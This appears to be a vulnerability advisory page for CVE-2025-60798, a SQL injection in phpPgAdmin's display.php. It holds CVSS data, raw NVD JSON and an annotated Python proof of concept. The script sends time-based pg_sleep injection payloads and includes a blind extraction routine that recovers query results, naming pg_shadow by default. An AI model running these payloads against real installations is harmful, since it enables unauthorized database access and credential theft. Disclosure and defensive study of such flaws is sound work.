Security Vulnerability Report
CVE-2025-60798 CVSS 6.5 MEDIUM

CVE-2025-60798

Published: 2025-11-20 15:17:38
Last Modified: 2025-11-25 19:11:51

Description

phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise.

CVSS Details

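CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The vector describes a network-reachable, low-complexity attack that requires low privileges and no user interaction, with high confidentiality impact and no integrity or availability impact. The description above speaks of executing arbitrary SQL commands and complete database compromise, which is broader than this confidentiality-only rating.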

Configurations (Affected Products)

cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* - VULNERABLE
phpPgAdmin <= 7.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-60798: proof-of-concept for the SQL injection reported in
# phpPgAdmin 7.13.0 and earlier (display.php, $_REQUEST['query']).
#
# NOTE(review): the listing on the source page was collapsed onto two lines,
# so the indentation below is reconstructed from syntax. One string literal
# that the page wrapped across lines has been rejoined.
#
# What the script does: it sends GET requests to display.php whose `query`
# parameter contains a pg_sleep() call, and treats a slow response as
# evidence that the injected statement ran. Only elapsed time is checked, so
# a response that is slow for unrelated reasons is also reported as a hit.
#
# Defender notes:
#   * The payload travels in the URL query string (requests' `params=`), so
#     it typically appears in web-server access logs for display.php; the
#     literal `pg_sleep` inside the `query` parameter is common to both
#     functions below.
#   * If the injected statement executes, PostgreSQL statement logging
#     (`log_statement`, `log_min_duration_statement`) would record the sleeps.
#   * Every request carries a session cookie, matching the advisory's
#     "authenticated attacker" (PR:L); limiting who can reach and log in to
#     phpPgAdmin narrows exposure. This page lists no fixed version.


def exploit_sql_injection(target_url, session_cookie, table_name="pg_shadow"):
    """Send one timing probe to display.php and report whether it was delayed.

    The probe's `query` value calls pg_sleep(5) under an always-true
    condition (1=1). No data is read back; only the response time is used.

    Args:
        target_url: Base URL of the phpPgAdmin install; "/display.php" is
            appended to it.
        session_cookie: Value sent as the phpPgAdmin_Session cookie.
        table_name: Relation named in the probe's FROM clause.

    Returns:
        True when the response took more than 4 seconds, otherwise False
        (including when the request raised a RequestException).
    """
    # Endpoint named in the advisory.
    vuln_url = f"{target_url}/display.php"

    # Timing probe: the CASE condition is the constant 1=1, so the sleep
    # branch is always the one selected.
    payload = f"'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM {table_name}--"

    headers = {
        'Cookie': f'phpPgAdmin_Session={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Request context is hard-coded by the PoC author.
    params = {
        'query': payload,
        'server': '1',
        'database': 'postgres',
        'schema': 'public',
        'table': 'users'
    }

    print(f"[*] Target: {vuln_url}")
    print(f"[*] Payload: {payload}")
    print(f"[*] Sending malicious request...")

    try:
        response = requests.get(vuln_url, params=params, headers=headers, timeout=30)
        print(f"[+] Response status: {response.status_code}")

        # 4 s threshold against a 5 s sleep; the status code is printed but
        # plays no part in the verdict.
        if response.elapsed.total_seconds() > 4:
            print("[+] SQL injection confirmed! Time-based blind injection successful.")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

    # NOTE(review): placed at function level; the collapsed source does not
    # show whether this line belonged to the except block instead.
    return False


def extract_data_blind(target_url, session_cookie, sql_query):
    """Recover a string one character at a time from response timing.

    For each position 1..49 and each character in a 64-character set, one
    request is sent whose `query` sleeps 3 seconds when the character at
    that position of `sql_query`'s result matches. That is up to 49 * 64
    requests to display.php differing only in position and character, a
    repetitive pattern that stands out in access logs.

    Not called by the __main__ block in this listing.

    Args:
        target_url: Base URL of the phpPgAdmin install.
        session_cookie: Value sent as the phpPgAdmin_Session cookie.
        sql_query: SQL expression interpolated unmodified into the payload.

    Returns:
        The characters matched so far, as a string (possibly empty).
    """
    extracted_data = ""
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-'

    for pos in range(1, 50):
        found = False
        for char in charset:
            # The sleep happens only when the compared character matches.
            payload = f"'; SELECT CASE WHEN (SELECT SUBSTRING({sql_query},{pos},1)='{char}') THEN pg_sleep(3) ELSE pg_sleep(0) END--"

            params = {
                'query': payload,
                'server': '1',
                'database': 'postgres'
            }

            headers = {'Cookie': f'phpPgAdmin_Session={session_cookie}'}

            try:
                response = requests.get(f"{target_url}/display.php", params=params, headers=headers, timeout=10)

                # 2 s threshold against a 3 s sleep.
                if response.elapsed.total_seconds() > 2:
                    extracted_data += char
                    print(f"[+] Extracted so far: {extracted_data}")
                    found = True
                    break
            except:
                # Errors are skipped silently, so an empty result does not
                # distinguish "no match" from "every request failed".
                continue

        # Stop once a position yields no match after at least one character
        # has been recovered.
        if not found and extracted_data:
            break

    return extracted_data


if __name__ == "__main__":
    # Requires two positional arguments: base URL and session cookie value.
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        print(f"Example: python {sys.argv[0]} http://localhost/phppgadmin abc123def456")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-60798 SQL Injection PoC")
    print("phpPgAdmin 7.13.0 and earlier")
    print("=" * 60)

    # Only the single timing probe runs; its return value is not used.
    exploit_sql_injection(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60798", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.393", "lastModified": "2025-11-25T19:11:51.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/display.php#L396", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60798.md", "source": "[email protected]", 
"tags": ["Third Party Advisory"]}]}}